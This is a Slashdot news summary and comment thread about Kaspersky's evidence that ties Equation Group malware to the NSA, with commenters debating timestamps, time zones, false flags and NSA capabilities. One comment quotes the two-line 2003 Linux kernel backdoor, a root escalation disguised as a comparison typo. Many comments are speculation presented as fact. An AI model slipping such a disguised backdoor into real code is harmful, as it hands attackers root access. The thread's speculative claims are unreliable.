New Evidence Strengthens NSA Ties To Equation Group Malware 129
An anonymous reader writes: When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA's Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. "Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike."
Boy am I glad (Score:1)
I am glad our best and brightest are better than their best and brightest... keeping us safe from cyber-terrorism is a huge priority.
Re: (Score:2)
Except we're getting caught and they aren't.
Who's cool now?
Re: (Score:1)
Except we're getting caught and they aren't.
Doesn't seem to matter. Business is good.
Re: (Score:2)
Seriously this is sloppy work. Esp. if the dates and ties also correlate to Federal holidays. Haven't they ever heard of scheduled build jobs? Pick a random time in a 24 hour range. Also make sure to cover weekends and holidays.
Re: (Score:2)
Either it's sloppy work, or a devilishly clever band of Russian hackers. You choose.
A few embedded strings and timestamps? (Score:3, Interesting)
Re: (Score:1)
Re: (Score:2, Informative)
Re: A few embedded strings and timestamps? (Score:3)
I was about to pay the exact same thing, only Newfoundland and a few Caribbean islands are UTC -3. It was those canuckistani's I tell you.
Re: (Score:2)
...never UTC-3 unless someone is working very early hours. So it seems like weak evidence indeed!
AFAIK working early doesn't change your timezone, unless you're a pilot or long-distance driver (if it did I probably would have lapped my office a few times by now).
UTC-3 seems to only cover part of Greenland and Brazil, both well-known hotbeds of hacker activity. I suspect that the timezone information is as accurate as info found in random strings in the malware (BACKSNARF_AB25: darn it, time to change the combination on my luggage again...).
Re:A few embedded strings and timestamps? (Score:5, Insightful)
What the summary said was that the timestamps are consistent with an 8-5 day in those time zones, not that the timestamps came from those timezones. Timestamps aren't UTC anything -- they're milliseconds since epoch (generally), and the OS converts on the fly when displaying. I can't speak for the NSA, but core hours are 10-3 for many government workers, and many people go in to the office early to beat traffic. Also, the NSA is under the DoD, and DoD tends to get an early start. All of that is consistent with what one would expect to see.
And to address the GP, the odds of finding a string that matches a codeword, especially a unique codeword, are very slim. Probably millions to one. You're not going to find, say, "XKEYSCORE" in Microsoft or Apple source code. That's the most convincing evidence -- the timestamp stuff is just icing.
I expect to see future exploits released with standardized timestamps and obfuscated strings.
Re:A few embedded strings and timestamps? (Score:4)
You're not going to find, say, "XKEYSCORE" in Microsoft or Apple source code.
Ha, are you really sure about that?
Re: (Score:2)
No. ;)
Re: (Score:2)
Re:A few embedded strings and timestamps? (Score:5, Insightful)
I mean, are the only software developers who work normal business hours on normal workdays in the Eastern timezone all working for the NSA?
Very few regular businesses in the eastern USA hire hackers to attack others, so most hackers have much more varied time allocations reflecting that they do it after work / on weekends or are unemployed. The hours strongly suggest employees, so what other employer seems likely to you?
Re: (Score:2)
XKEYCODE can be found in a very large OSS software package and was there before the NSA even imagined using the letters for themselves.
Re: (Score:3)
Re:A few embedded strings and timestamps? (Score:5, Insightful)
I'd expect the odds of the NSA accidentally embedding the same strings in multiple exploits to be around 100%. They're humans, they're lazy, they copy stuff and they want readable code. Why wouldn't they?
Re: (Score:2)
I'd guess it as weak, but not really weak. Sort of "reasonable ground for suspicion", but clearly not "reasonable grounds for belief".
Re: (Score:2)
... Unless it was put there on purpose, to mislead you into thinking ... it was the NSA.
Seriously, this takes 0 work to make it appear to be the NSA, a 5 minute script could do this to anything, based on the minute level of detail you seem to think is sufficient.
Re: (Score:3)
Unless I am mistaken, the Washington, USA, area runs on UTC-5 when on Eastern Standard Time and UTC-4 when on Eastern Daylight Time; never UTC-3 unless someone is working very early hours. So it seems like weak evidence indeed!
Funny how this is weak evidence, but stuff like this is what they used to say North Korea hacked Sony.
Re: (Score:2)
Prove you are not a serial murderer. If someone has the means to do something it is very difficult to prove they did not do it. That is why the burden of proof is always on the prosecutor to prove a suspect did a crime and not on the suspects to prove they did not do it.
Re: (Score:2)
Well, I certainly have been guilty of trashing a few DB-9 plugs in my day.
RS-232 was never my favorite protocol.
Re: (Score:2)
Well, the US was quite happy to use to claim that the coding style was similar so the North Koreans hacked Sony so they've set the bar so low for what "smoking guns" are going to be.
BACKSNARF_AB25 = signed confession (Score:1)
It includes the name of the program, as known from the Snowden documents, so its a SIGNED CONFESSION.
Re: (Score:2)
Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Um, the UTC is -4:00 (EST) through UTC -7:00 (PST) when on Standard Time. The UTC offset is -5:00 through -8:00 when the US is on Daylight Time. The exception to this is the majority of Arizona which doesn't change at all.
Re: (Score:2)
Um, the US is on UTC -5:00 (ET) through UTC -8:00 (PT). My money is on those pesky Greenlandic uber-hackers.
Um, the UTC is -4:00 (EST) through UTC -7:00 (PST) when on Standard Time. The UTC offset is -5:00 through -8:00 when the US is on Daylight Time. The exception to this is the majority of Arizona which doesn't change at all.
Whoops...Standard is -5 through -8 and Daylight is -4 through -7, my bad.
Scenario (Score:4, Interesting)
Hypothetical Scenario: I work as a coder for the NSA, I work with an extremely talented group, we code the latest, most aggressive malware available.
We make the Russians look like Girl Scouts.
How much do you think they pay me?
How much could I make selling the stuff I code at the NSA to various "businesses".
Does anyone in that position believe in nationalism?
Re: (Score:2)
How much will you be dead and unable-to-ever-be-burried if the NSA finds out?
Re:Scenario (Score:4, Funny)
As much as Snowden is.
Re: (Score:2)
Snowden was an IT guy. A flunky.
Sorry to break it to all you other IT guys. He was not a top realm coder. Very few 'IT guys' are top realm coder.
Re: (Score:3)
Re: (Score:3)
Snowden was the guy. He didn't get caught until he outed himself to give the leaks credibility. Of course if he was doing espionage he just would have kept is mouth shut and accepted money.
What is more likely, is that NSA contractors have jobs moonlighting for large corporations as intellegence officers an simply use NSA resources at work for their c
Re: (Score:1)
NSA do poke their fingers into commercial interest.
Personally I think the majority of the work they do is related to finance in some fashion.
Re:Scenario (Score:5, Insightful)
How much do you think they pay me?
You can look at the careers on their website. Exploit Engineer pays $64,923 to $96,931. I'm sure that matches up with a GS payscale number somewhere, but I'm too lazy to map it.
How much could I make selling the stuff I code at the NSA to various "businesses".
Not much, or at least not for very long. You can bet your ass you sign an ironclad NDA, and if anyone's going to know whether you violated that, it's the NSA.
Does anyone in that position believe in nationalism?
Most of them, yes. Employment is actually pretty competitive, and people don't become government employees for the money. Job security, maybe, but the money is usually below average.
Re: (Score:3)
Re: (Score:2)
only because the private sector average is eroding rather rapidly. It was at one time higher pay in the private sector but thanks to 30 years of economic policy that has changed.
Re: (Score:2)
Compared to the average person in your same field, with your same skills, as an expert coder/hacker/etc? Not even close.
Federal jobs are great if you're a lower skilled worker, whether office or otherwise (although good luck getting those jobs, as many of the ones the government used to have are now contracted out to save money). The higher your skills, and the more in demand your position, the worse the pay disparity with your counterparts in the private se
Re: (Score:2, Interesting)
Does anyone in that position believe in nationalism?
If I didn't believe that most of them do, I wouldn't be so frightened.
There's no one capable of doing more evil than those who sincerely believe that they're doing good.
"Exploit Engineer" (Score:3)
Re: (Score:2)
At a guess:
Almost ALL of them start out believing fervently in US nationalism. They they spend a few decades in internal bureaucracy and become both cynical and disgusted. Some of them become more disgusted, and others become more cynical.
Re:Scenario (Score:5, Insightful)
My dear friend, you do not understand how these things work.
You work at NSA, you are always using the latest, newest, biggest, baddest, sweetest technology ever devised by men [nsa.gov]. You literally have computer companies begging you to buy their stuff. For a lot of these people (heck, that may even include me) that is motivation enough.
AND, if you are discreet about it, you can even be privy to potentially very lucrative [buzzfeed.com] a lot of state secrets [theguardian.com]. Or even personal secrets, who knows? [pcworld.com]. Obviously, if Snowden gave us something, it is the knowledge that NSA is not very good at information compartmentalization...
But here is the kicker: if you ever decide to leave the NSA, for retirement or otherwise, the private sector (at least the US private sector [bloomberg.com]) will greet you with open arms and pay you a sh*tload of money to work as a consultant or senior manager [cryptome.org]. And we are talking about a SH*TLOAD of money, conflict of interests be damned [bloomberg.com]. You are now one of the big boys, kid, enjoy your (semi-)retirement.
No need to betray US interests, no need to reveal super secret information: you are NSA. You are above the law. Just leave your morals at the door, please.
Re: (Score:1)
You don't have the clearance for this thread.
Re: (Score:2)
The best hardware, leanest algorithms, most interesting problems, and probably the only group of people within 200 miles that gets your jokes.
Hahahahaha. What a joke. (Score:1)
Do me a favour. Spooks putting strings identifying their top secret programme by name into malware? Jesus Christ you people are gullible.
Re: (Score:2)
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Re:Hahahahaha....But Wait! (Score:1)
I was thinking just about the same thing.
Why don't hackers call their projects "8d 7d 6c 05" or "33 02 ba 9c" in source code constants?
Why would they even include any non-essential things in the code at all?
Remember nimda virus ? (thats admin backwards)
NIMDA was a polymorphic plague of a virus that hit out network right after 9/11/2001.
It would write itself all over every file on the disk drive until the drive was full and everything came to a screeching halt. It exploited the NT web service that was active by group policy default on client boxes with NT and or Win 2000. Anyway, our software engineers looked inside the Nimda.dll and there was some jihad "Death to America, Death to Israel" crap comme
Re: (Score:3, Insightful)
> Do me a favour. Spooks putting strings identifying their top secret programme by name [...]
The alternative is thrilling too: malware authors knowing the names of top-secret NSA programmes (I assume this malware was hacked together pre-Snowden)? Hmmm.
I don't know the name of the razor to apply here. But it's a hell of a razor, for sure.
Re: (Score:2)
Hope and Belief.
How leet can they be? (Score:5, Funny)
If they don't bother to change the timestamps to 03/13/37.
Re: (Score:2)
Because there's no month 13 (in the Julian calendar) and no day 37 (again, Julian) and I would suspect a lot of hackers don't use the mm/dd/yy notation but the yy/mm/dd notation.
Re: (Score:2)
why not 6/31/xxxx ? or 316xxxx
That would give the security guys a headache.
And code written on Mondays sucked (Score:1)
Rats hoisted by their own profiling petard.
Let's roll our own Time Zones too! (Score:2)
Maybe someone needs to look up just what parts of the world actually use UTC-0300 [wikipedia.org].
Re: (Score:1)
So, you work at a government contractor on the East Coast (VA/DC/MD anyone...nah no gov't contractors there). These type of workers start early AM, before most people are awake for the day. 7-8 AM start times are not unheard of. This would coincide with what? A 9-5 workday in UTC-0300 or UTC-0400 you say? No, can't be. The people writing the article really, truly meant the elite uber-hackers of Greenland and Nova Scotia.
Re:Let's roll our own Time Zones too! (Score:4, Insightful)
"[...] modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones"
When writing an article of this sort your goal should be to _explain your position_, not to create a math problem which, if solved in the correct manner, suggests what your position could be. If the authors wanted to point to a 7-3 work day in UTC-5, they should have simply said so instead of going out of their way to state something quite different.
It's not hard.
Here, it could look something like this:
"[...] modification timestamps were almost always consistent with a 7-3 workday in the US Eastern timezone (UTC-5), allowing for standard Daylight Savings changes as observed in Virginia, DC and Maryland"
It should not look like this:
"[...] modification timestamps were almost always consistent with an 8 PM - 5 AM workday in the UTC+9 time zone, showing that this was clearly the work of North Koreans with insomnia"
Do you see the difference?
Re: (Score:2)
Typically, you won't see the timestamps of when people worked, but when the builds were run.
It doesn't point anywhere, because there's no telling when companies run their builds. Some run nightly builds, others continuous builds.
Re: (Score:2)
> Typically, you won't see the timestamps of when people worked
Because programmer's worth any kind of salt don't manually check-in (commit) their own changes?
Re: (Score:2)
They check in the source code, not the object files.
The object files won't have the time stamp of the commit of a source file, but the timestamp of when they were created by a build.
Recall the Linux Back door attempt (Score:1)
If you remember when some agent broke into a Linux source repository and added a disguised backdoor attack?
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
Effectively letting them get root, if they passed those flags into the wait4 call.
But, In the End, We need (Score:1)
Our NSA had damn well be better than Putin's and LiKeqiang's or all of us in the US are going to be irretrievably harmed.
Planted? (Score:1)
1. Fake the time stamps to look lile eastern US
2. Add a well known NSA project name to the code
3. "Leak" information about these issues.
4. Profit
Could this information be a plant to point the finger at the NSA?
Re: (Score:1)
Do as I say not as I do (Score:1)
Wasn't the US government condemning the hack of Sony pictures and instituting economic sanctions based on some shaky evidence that North Korea was involved? I wonder what actions the 42 plus countries that have been infected with Equation Group malware should take against the US government.
Ah...Time Zones...Such tricky things. (Score:1)
From the article: "Assuming they worked a regular 8 to 5 workday, the timestamps show the employees were likely in the UTC-3 or UTC-4 time zone, a finding that would be consistent with people working in the Eastern part of the US."
Neither UTC -03:00 nor UTC -04:00 are associated with the Eastern US.
UTC -03:00 is associated with: Buenos Aires, Montevideo, São Paulo
UTC -04:00 is associated with: Santiago, La Paz, San Juan de Puerto Rico, Manaus, Halifax
UTC -05:00, however, is however, associated with Eas
Not much in the way of evidence (Score:1)
Timestamp silliness (Score:2)
For a largish project I would suspect that the release builds are run over night, CI builds during the work day.
doesn't sound right (Score:2)
Re: (Score:1)
Re:Kaspersky Lab (Score:5, Insightful)
I am not too worried about Putin.
What I am worried about is this: the Equation malware was used years ago. We know these guys are good at what they do. Very good.
NSA has been working on that stuff since the 1950s -- that's 65 years of experience, folks, and they have been big computer users since day ONE -- heck even before day one, if you count Bletchley Park and stuff like the cracking of Red, Purple and JN cyphers [wikipedia.org].
So, we are talking about an organization that has huge experience in cracking systems and crypto, and the enormous budget to support its activities.
So: what have they been producing between Equation and, let's say, Stuxnet, and today?
Equation was -- from what I understand -- fairly Windows specific. What have they got now? The stuff coming out of all these not-so-funny super top secret projects?
Here is a hint: combine stuff like Heartbleed (OpenSSL), ShellShock, stuff that lingered in code bases for decades before being found out, maybe other stuff such as a few rumors about OpenSSH backdoors (remember those? [slashdot.org]) and the "let me install myself cosily in your HDD BIOS where you cannot dislodge me" capabilities of Equation and, presto! No one is safe from the prying eyes of NSA anymore.
That's the kind of things that makes you lose sleep at night. At least, I do lose sleep over it. Georges Orwell had nothing on these guys.
What if you are only running open-source? Vulnerable. Audited open-source? They have 100 times the manpower of the best programming teams out there. Heck, they may even have inflitrated these projects in the first place!
And don't forget one last things: the guys are masters of misdirection. NSA and GCHQ and everyone in between said for years that Enigma was safe to use, even after the nd of WWII. It's extremely simple for these people to say (unofficially, of course) "Drats! This guy is using open source! Foiled again! Damn you open source programmers!! Damn you all to hell!!!", all the while exploiting Linux/BSD machines as easily as "1-2-3". And we know they like subtle.
So, here is the question: what do they have, right now, that we don't know about? Think about that for a second.
Re: (Score:2)
Hey, you know the UK government shared all the secrets of Bletchley Park with the US government, right?
Re: (Score:2)
What do you mean? The known unknowns or the unknown unknowns?
I used to think I knew what I didn't know, now I don't know...
I now know I need a lot more foil!
http://www.amazon.com/Durable-Packaging-92410-Heavy-Aluminum/dp/B00KNM30UM [amazon.com]
The really troubling part (Score:3)
And if the Senators or POTUS get uppity, well no one that achieves those offices are innocent, thus they are completely blackmailable, if not subject to out and out threats (especially their families).
I think this is the main reason every man that now becom
Re: (Score:2)
I don't know if it's still true, but several years ago I was told that there are rainbow tables that permit relatively easy login to Linux systems. To foil that you need to have a limited number of login attempts per day, probably implemented by an increasing time limit since the last bad login...and I've never seen that as an option on a Linux system. (I'm sure it is, because it's a dead-simple obvious approach. It might require you to unplug from the net to login while you were under attack, but that's
Re: (Score:2)
With a rainbow table you can brute-force a password if you know the password hash. You need only one login attempt -- and you need the hash, for which you normally need root access to start with, at least for the last 20 years. Unix/Linux passwords have always been stored as salted hashes, which makes rainbow tables not practical. The practical way to brute-force a password is therefore a dictionary attack.
Re: (Score:2)
A rainbow table might not be practical for you and I, but might be practical for the NSA. But as you say, it assumes you have the passwd hash table already. In the old days it was exposed in /etc/password, but that hasn't been the case in decades.
Re: (Score:2)
If the NSA can remove the effects of the salt in order to use a rainbow table, they've cracked the hash, and don't need a rainbow table. If not, even a two-byte salt would increase the size of the rainbow table by 65.536 times, and I doubt the NSA is going to use tables that much bigger than they need. They'd almost certainly do a dictionary attack and other things, which essentially means building a rainbow table as they go. It's more computation, but, really, this is the NSA.
Even if the NSA has root
Re: (Score:2)
I don't doubt the NSA has been doing nefarious things since the 50s, but I suspect their more outlandish things like this have taken shape since 9/11.
Re: (Score:2)
Lets hear for the pulling shit out of our collective asses system! The same goes for any software made by any company in the world... Unless you can see the source and it is open you can't but hope. Why not say it is Snowden who did this so he can sell botnets to Putin. If you have a shred of evidence that Putin has backdoored kaspersky then bring it to light.
Re: (Score:1)
I do not think bringing Snowden into the example really works on this one, as he did actually steal classified info and post it to the internet/news, no belief needed. I do hope he gets a fair and public trial though, but I believe he will never make it to cour
Re: (Score:1)
I do not think bringing Snowden into the example really works on this one, as he did actually steal classified info and post it to the internet/news, no belief needed. I do hope he gets a fair and public trial though, but I believe he will never make it to court.
Edward Snowden never publicly released any classified information. The media organisation entrusted with the document collection provided by Snowden have been releasing albeit at a trickle-pace any and all such classified documents. Yet the media organisations are not being shutdown or the owners, editors, journalists arrested and charged. Nope. But Edward Snowden, for unfathomable reasons, is State Enemy #1 according to the Government of the United States of Amerika.